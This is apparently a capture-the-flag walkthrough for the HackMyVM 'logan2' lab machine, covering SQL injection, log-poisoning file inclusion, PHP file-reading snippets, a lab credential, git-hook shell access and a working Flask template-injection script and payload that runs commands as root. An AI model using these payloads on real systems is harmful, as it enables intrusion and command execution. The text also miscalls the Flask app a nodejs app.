hackmyvm: logan2

1. get user shell

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp(gitea)

browse port 80, find a sql injection.

using sqlmap, we got a new domain: newsitelogan.logan.hmv

add the domain to the hosts, and visit. from the comments, it can be seen that there is a file inclusion.

use this file inclusion and apache2’s log file, we can exec phpinfo(but exist disable_functions).

we use func scandir、file_get_contents to get gitea user logan and password Super_logan1234.

$arrFiles=scandir('.');foreach($arrFiles as $sfile){echo $sfile;}

echo file_get_contents("config.php");

browse port 3000, use the user and password, by git hooks, we get the user shell.

2. get root shell

run sudo -l, we can run command /usr/bin/python3 /opt/app.py as the root user. this is a nodejs app listening on port 8000.it’s very easy to get shell by flask model inject.

first, get the os._wrap_close.

#!/usr/bin/python3
import requests
for i in range(0, 300):
    url = 'http://192.168.143.236:8000/test?name={{%27%27.__class__.__mro__[-1].__subclasses__()[' + str(i) + ']}}'
    r = requests.get(url=url).text
    if 'os._wrap_close' in r:
        print(i)
        break

then, we can run commands to get flag.（omit flag）
http://192.168.143.236:8000/test?name={{%27%27.__class__.__mro__[-1].__subclasses__()[140].__init__.__globals__[%27popen%27](%27cat /root/root.txt%27).read()}}